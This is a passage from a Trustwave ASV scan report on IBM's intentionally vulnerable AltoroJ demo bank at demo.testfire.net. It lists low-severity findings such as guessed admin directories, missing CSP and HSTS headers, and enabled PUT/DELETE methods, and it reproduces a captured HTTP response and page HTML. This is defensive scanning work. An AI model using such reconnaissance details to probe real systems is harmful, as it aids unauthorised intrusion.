Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

459 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/subscribe.jsp


Port: tcp/80

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 776 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

460 Discovered Web Directories 0.0 Info Pass URL: http://65.61.137.117:8080/admin/


Port: tcp/8080

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://65.61.137.117:8080/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

461 Discovered Web Directories 0.0 Info Pass URL: http://demo.testfire.net:8080/bank/


Port: tcp/8080

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 777 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: http://demo.testfire.net:8080/bank/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

462 HTTP Responses Missing 0.0 Info Pass URL: http://demo.testfire.net:8080/high_yield_investments.htm


Character Encoding Port: tcp/8080

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 778 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: http://demo.testfire.net:8080/high_yield_investments.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

463 Website Detected 0.0 Info Pass URL: http://demo.testfire.net/


Port: tcp/80

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 779 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

464 Website Detected 0.0 Info Pass URL: http://65.61.137.117:8080/


Port: tcp/8080

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

465 Discovered Web Directories 0.0 Info Pass URL: https://65.61.137.117:8443/bank/


Port: tcp/8443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:8443/bank/

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 780 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

466 Discovered HTTP Methods 0.0 Info Pass URL: https://65.61.137.117:8443/swagger/


Port: tcp/8443

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: https://65.61.137.117:8443/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

467 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117:8443/retirement.htm


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 781 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117:8443/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 782 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

468 Enumerated Applications 0.0 Info Pass URL: https://65.61.137.117:8443/


Port: tcp/8443

The following applications have been enumerated on this device.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
CPE: apache:tomcat
URI: /
Version: unknown

Remediation:
No remediation is required.

469 Website Detected 0.0 Info Pass URL: https://demo.testfire.net:8443/


Port: tcp/8443

This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

470 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/index.jsp?content=personal.htm


Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 783 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

471 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/doSubscribe


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

472 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117:8443/swagger/index.html


Port: tcp/8443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

473 Insecure or no Content- 0.0 Info Pass URL: https://65.61.137.117/


Security-Policy header Port: tcp/443

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 784 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4;
Path=/; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:04:18 GMT
Content-Length: 9369

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 785 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 786 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 787 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 788 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 789 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="
128" /></center>
<br /><br/>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 790 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170"


height="113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 791 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br /><br />
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 792 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to
prevent Cross-Site Scripting issues.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 793 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

474 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

475 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/login.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

476 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/disclaimer.htm?url=http://www.microsoft.


com
Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

477 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/index.jsp?content=business.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 794 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

478 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/status_check.jsp


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

479 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117/index.jsp


Port: tcp/80

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

480 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/disclaimer.htm?url=http://www.


microsoft.com
Port: tcp/8080

A website location was detected.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 795 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

481 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/doSubscribe


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

482 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Evidence:
hostname: demo.testfire.net
ip_address: 65.61.137.117

483 Insufficient or No use of 0.0 Info Pass URL: https://65.61.137.117/


Strict Transport Security Port: tcp/443
header
HTTP Strict Transport Security (HSTS) is an opt-in security
enhancement that is specified by a web application through the use of
a special response header. Once a supported browser receives this
header that browser will prevent any communications from being sent
over HTTP to the specified domain and will instead send all

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 796 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
communications over HTTPS. It also prevents HTTPS click through
prompts on browsers.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/HTTP_Strict_Transport_Security

Evidence:
DetectionDetails: No HSTS implemented for HTTPS
Request: GET https://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Example of response header use-
Strict-Transport-Security: max-age=31536000

484 Embedded links or code 0.0 Info Pass URL: https://65.61.137.117/index.jsp?content=inside_contact.htm


from out-of-scope domains Port: tcp/443

Externally served scripts or objects can present a security risk because


they are not subject to system and application controls. Including
scripts from untrusted domains can result into any one of following 1-
Loss of control over changes to the application. 2- Execution of
arbitrary code on client systems. 3- Disclosure or leakage of sensitive
information to 3rd parties.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 797 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Evidence:
DetectionDetails: Following External Links Found:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/fl
ash/swflash.cab#version=6,0,0,0" width="125" height="50"
id="subscribe" align="middle"> <param name="allowScriptAccess"
value="sameDomain"> <param name="movie"
value="subscribe.swf"> <param name="quality" value="high">
<param name="bgcolor" value="#ffffff"> <embed
src="subscribe.swf" width="125" height="50" text="subscribe"
align="middle" type="application/x-shockwave-flash"> </object>
Request: GET
https://65.61.137.117/index.jsp?content=inside_contact.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Remediation:
If external scripts are necessary to provide a particular service then get
the scripts from the third party, perform a review for functionality and
integrity and post it on a web server.

485 Website Location Detected 0.0 Info Pass URL: https://65.61.137.117/sendFeedback


Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 798 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

486 Website Location Detected 0.0 Info Pass URL: http://demo.testfire.net:8080/swagger/index.html


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

487 Website Location Detected 0.0 Info Pass URL: https://demo.testfire.net/status_check.jsp


Port: tcp/443

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

488 Website Location Detected 0.0 Info Pass URL: http://65.61.137.117:8080/index.jsp?content=inside.htm


Port: tcp/8080

A website location was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 799 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
